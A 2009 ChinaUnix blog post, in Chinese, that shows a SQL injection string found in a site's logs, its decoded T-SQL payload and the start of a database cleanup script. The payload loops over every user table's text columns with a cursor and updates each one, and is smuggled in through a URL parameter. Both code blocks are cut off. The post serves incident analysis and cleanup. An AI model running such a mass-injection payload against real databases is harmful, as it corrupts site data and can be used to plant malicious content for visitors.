一段SQL注入代码与数据库注入内容清理-baill-ChinaUnix博客

Baill's Space

首页　| 　博文目录　| 　关于我

baill

博客访问： 189971
博文数量： 57
博客积分： 1625
博客等级：上尉
技术积分： 715
用户组：普通用户
注册时间： 2007-07-15 10:55

文章分类

全部博文（57）

文章存档

2012年（2）

2011年（12）

2010年（15）

2009年（19）

2008年（9）

我的朋友

相关博文

一段SQL注入代码与数据库注入内容清理

分类： WINDOWS

2009-08-13 08:27:53

注入代码：

日志中找到的注入记录：

)--

经解码后的攻击代码：

articletype=8';declare @s varchar(8000) set @s="Declare @T Varchar(255),@C Varchar(255)

Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''

exec @s

数据库清理代码：

declare @name as nvarchar(128),@columnName as nvarchar(128),@columnType as nvarchar(128),@injectSql as nvarchar(111)

set @injectSql='

阅读(980) | 评论(0) | 转发(0) |

上一篇：站点安全检测工具

下一篇：奇怪的域用户身份验证丢失

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6